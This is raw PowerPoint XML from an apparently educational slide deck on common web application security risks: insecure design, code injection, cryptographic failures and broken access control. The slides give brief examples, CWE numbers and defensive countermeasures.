                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64F6B794-F56F-9EEA-FC8E-94D853800E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="88319"/>
            <a:ext cx="539496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CWEs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>73 183 209 213 235 256 257 266 269 280 311 313 316 419 430 434 444 451 472 501 522 525 539 579 598 602 642 646 650 653 656 657 799 807 840 841 927 1021 1173</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA365D57-59B4-F3FC-7970-2ADD183B2E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3200400"/>
            <a:ext cx="6629400" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: GPU Website with no anti-bot protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Question and Answers for credential recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Bank app that allows a user to transfer money without authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="weak security Meme Generator - Imgflip">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7828BA7-FB35-8D1F-653E-2E4620E9AF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9200" y="1324877"/>
            <a:ext cx="2138363" cy="21383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6246024-A08F-FA93-F548-2DCB6AA96DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8498348" y="3986403"/>
            <a:ext cx="3200400" cy="2308324"/>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Secure Design Pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adequate requirement gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Development Lifecycle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995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3D31583-F749-C30B-C853-071B9FDA0FE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8F62A565-D791-9BF6-F054-174790697677}"/>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8788E93D-B85A-85F7-1CD5-BDA7A3CF0B06}"/>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63C33723-6219-D671-75CA-CB8CF9C85769}"/>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9D5C80C7-6315-F98B-D87B-0765D7FA9479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF086FD9-7555-A52B-7DF2-0AC70FF94E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17469AA0-8725-B9D8-1A52-E34E3D55D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33400"/>
            <a:ext cx="9610725" cy="51219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indows 10 Help Forums">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318AC992-969F-8467-59C8-4DB88C207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762000"/>
            <a:ext cx="2726682" cy="40862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uld someone make the League of Legends &quot;Missing Ping&quot; into a transparent  gif? : r/PhotoshopRequest">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4033FA7F-54FA-17B0-51FC-4DABD0B692F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3390900"/>
            <a:ext cx="712144" cy="70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556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AD782A0-CBFA-60D1-132E-0365B202F521}"/>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3077826-3B3B-9AE6-4237-0103F495F6C6}"/>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79D761DE-7FAF-319C-A79A-ECFBDCD5BE9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9F6AD0BC-8BF7-9E54-D44D-E933A9C60CC4}"/>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682C0260-911D-4094-19B0-28D52FA6727D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416442A2-D74D-3683-6425-10445DFB5D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6A562C-53D6-3B64-18B4-64DAB8599D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3688830" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>3. Code Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD49DC7-FE58-EA1A-4D2B-B86640825A92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="986760"/>
            <a:ext cx="5638800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User can inject malicious input due to poor input validation, filtering, or sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D10D438-A886-C0EE-ADCD-43551AF8D542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851963" y="1943552"/>
            <a:ext cx="2991525" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: SQL Injections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Example: XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="SQL Injection MEMExplained. Learning about SQL Injection with memes | by  Aman Garg (heizaman) | Medium | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B3BCAE-844C-DF0A-D3FF-128A03B5B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594" y="990600"/>
            <a:ext cx="3395241" cy="3352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FC927F4-DCD4-72EE-931E-5257137F566C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906000" y="75613"/>
            <a:ext cx="2194560" cy="597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CWEs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>way too many</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="How to Defend Your Business Against SQL Injections | Logz.io">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F43D6674-8EBE-DAF3-3305-45370C54A5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43270"/>
            <a:ext cx="2147740" cy="19097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rustedSec | Cross Site Smallish Scripting (XSSS)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E2E648-02AF-BB5B-C002-67523E5E7F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038600"/>
            <a:ext cx="2311052" cy="23431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B88321-6A06-116A-0F70-361637B75761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8271225" y="4496768"/>
            <a:ext cx="3200400" cy="2031325"/>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Parameterized queries, Prepare statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> input sanitize and validate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3973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77DCE0D-603D-B2FD-BE51-FA6040DC83B7}"/>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8024DFD8-586A-2043-9B66-EC85F7606444}"/>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C6D7291F-FE3D-7A65-460F-2F4AECB11B6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CC9DA38B-0624-0881-85B9-3828D58B4724}"/>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594C099C-8C57-F04F-4DFF-052209262576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC996D3F-9B01-BE3E-296B-8BCA378938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17CCA2-BB65-4CA4-A294-21292D37EDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5125121" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>2. Cryptographic Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F40320-C005-5454-4DFD-553F555BE68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1219200"/>
            <a:ext cx="4267200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Poor encryption practices that lead to data exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3B7957-4679-F576-61B0-F7AF2951D231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398778" y="2906617"/>
            <a:ext cx="4859022" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: use of HTTP instead of HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915710F0-2CDE-D150-5E8A-F854A55B0DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3429000"/>
            <a:ext cx="6152646" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: use of unsecure hashing algorithms (MD5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE3CE8F-F2EC-DEE1-BAB8-CF72BDEACE47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380987" y="3986363"/>
            <a:ext cx="4841390" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: poor cryptographic key storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="googleSideChannelAttackHolyHell : r/ProgrammerHumor">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB386AB6-EEB3-A671-D026-32FE65250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983944"/>
            <a:ext cx="5005031" cy="369903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E9CC1EE-47AB-756E-C4BA-5B31F37BB336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="76200"/>
            <a:ext cx="4328160" cy="597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CWEs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>261, 296, 310, 319, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 335, 336, 337, 338, 340, 347, 523, 720, 757, 759, 760, 780, 818, 916</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB333AD-623B-24D0-7EFD-D1410B606E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4494648"/>
            <a:ext cx="4195379" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6541FB9E-F5AC-AF62-9C7B-F4300FF37DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7903988" y="4667931"/>
            <a:ext cx="3200400" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Always ensure data is encrypted with secure up-to-date protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Do not hardcode secrets (keys) in source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Use Cryptographically secure hashing functions (SHA256)</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844061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6983869-B60F-003E-86A9-8DF573EF6F9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4432350-EBE8-06BF-B568-D58BE4F1C941}"/>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38A66E8B-171C-2F6D-F98F-494E9AE610BC}"/>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BBD60A69-9C9A-66A8-1752-51DB0A69593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5EAA180A-AA3C-672A-8254-26598476C4C6}"/>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1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90714C6D-7E33-0ED7-B557-7673374785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881D89-D831-16F3-1B12-19267C7EB72C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5171609" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>1. Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C26028F-40E3-8DF3-8A62-8BCFE95191DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1066800"/>
            <a:ext cx="5867399" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77DBA26-F5C7-AA7C-2396-4274577FAB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2974603"/>
            <a:ext cx="5840060" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: URL Manipulation to access admin web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E23FA76-A376-67C2-BB99-531D8BAABE10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="542925" y="3456093"/>
            <a:ext cx="5553075" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4DD0112-0C88-F0A9-871D-098639F95063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303122" y="4267200"/>
            <a:ext cx="6955750" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Accessing another user’s account without authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
